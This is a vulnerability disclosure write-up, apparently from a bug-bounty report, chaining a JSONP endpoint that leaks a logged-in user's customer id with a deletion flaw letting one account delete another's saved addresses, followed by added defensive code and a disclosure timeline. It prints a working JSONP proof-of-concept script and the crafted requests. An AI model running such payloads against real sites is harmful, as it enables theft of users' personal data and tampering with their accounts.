Jsonp+Excessive deletion Vul


1. First I found the endpoint on the website that leaked the user id.

jQuery111308705583230454748_1548063320659({"responseCode":"200","responseDesc":"success","responseData":{"cust":{"customerGuid":"df73d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"YongShao","gender":2,"country":"CN","countryName":"China","province":"CN-12","provinceName":"****","city":"CN-12-001","cityName":"****","telephone":"1***********","email":""}}})


Then I constructed a JSONP PoC to obtain the victim's id.


<script>function jQuery111308705583230454748_1548063320659(d) {alert(d['responseData']['cust']['customerGuid']);}</script><script type="text/javascript" src="https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getServiceCust/1000?jsonp=jQuery111308705583230454748_1548063320659&accountId=&source=100000007&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&language=zh-cn&siteCode=zh_CN&_=1548063320660"></script>


Got it.




2. Then I found that, by splicing this id into the request, I could get the user's address id.


https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getContactList/1000?jsonp=jQuery111308705583230454748_1548063320661&source=100000007&customerGuid=df73d476-5f1d-e911-80ff-*******&language=zh-cn&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&siteCode=zh_CN&_=1548063320667


Response:

jQuery111308705583230454748_1548063320661({"responseData":{"list":[{"customerGuid":"df73d476-5f1d-e911-80ff-******","contactAddressId":"e973d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"tset","country":"CN","province":"CN-12","city":"CN-12-001","district":"CN-12-001-02","isDefault":"N","createdon":"2019-01-21 03:45:04","countryName":"China","provinceName":"*****","cityName":"*****","districtName":"***","telephone":"131********","postCode":"","address":"*****"}]},"responseCode":"200","responseDesc":"success"})


The contactAddressId parameter identifies the address.



3. Try to use this information to perform the deletion from account B.


Press F12 and find the delete button:

<a data-contactaddressid="e973d476-5f1d-e911-80ff-******" class="delete-btn under-line" href="javascript:;">Del</a>


Then return to account A to confirm whether the deletion succeeded, observing through the JSONP interface.
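To make the two flaws above concrete from the defender's side, here is an added example (not code from the original post or from the affected site) that models both endpoints in memory: the JSONP wrapper that any third-party page can load with the victim's cookies, and the delete handler that trusts contactAddressId alone. All function names, ids and the session shape are assumptions; the data is constructed.

```javascript
// Constructed sample data (assumption): account A owns one address, account B owns another.
const addresses = new Map([
  ["addr-of-A", { contactAddressId: "addr-of-A", customerGuid: "guid-A" }],
  ["addr-of-B", { contactAddressId: "addr-of-B", customerGuid: "guid-B" }],
]);

// Vulnerable delete: looks up the row by id only, so a logged-in B can remove A's row.
// This is the "excessive deletion" half of the write-up.
function deleteAddressVulnerable(store, session, contactAddressId) {
  if (!session.customerGuid) return { responseCode: "401", responseDesc: "login required" };
  const removed = store.delete(contactAddressId);
  return { responseCode: removed ? "200" : "404", responseDesc: removed ? "success" : "not found" };
}

// Hardened delete: the row must belong to the session's customer. A non-owner gets the
// same answer as a missing row, so the endpoint does not confirm that the id exists.
function deleteAddressHardened(store, session, contactAddressId) {
  if (!session.customerGuid) return { responseCode: "401", responseDesc: "login required" };
  const row = store.get(contactAddressId);
  if (!row || row.customerGuid !== session.customerGuid) {
    return { responseCode: "404", responseDesc: "not found" };
  }
  store.delete(contactAddressId);
  return { responseCode: "200", responseDesc: "success" };
}

// Vulnerable response: wrapping authenticated data in a caller-chosen callback makes it
// readable by any origin that can embed a <script src=...> tag (the JSONP half).
function renderJsonp(callback, data) {
  return `${callback}(${JSON.stringify(data)})`;
}

// Hardened response: plain JSON under application/json. A cross-origin <script> tag
// cannot read this, and a cross-origin fetch() is blocked by the same-origin policy
// unless the server opts in with a specific CORS allow-list.
function renderJson(data) {
  return { contentType: "application/json", body: JSON.stringify(data) };
}

// If a JSONP endpoint must be kept for a legacy client, at least restrict the callback
// to a plain identifier so the wrapper cannot be turned into arbitrary script.
function safeCallbackName(name) {
  return /^[A-Za-z_$][\w$]*$/.test(name) ? name : null;
}
```

Run the vulnerable and hardened delete against a copy of the store with a session for account B to see that only the hardened version refuses to remove A's address.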




Timeline

2019.01.21 Reported the vulnerability

2019.01.22 Vulnerability received and transferred for processing

…… (I don't know when it was fixed.)

2019.02.19 Published this write-up

This article was first published on the WeChat public account (逢人斗智斗勇): Jsonp+Excessive deletion Vul
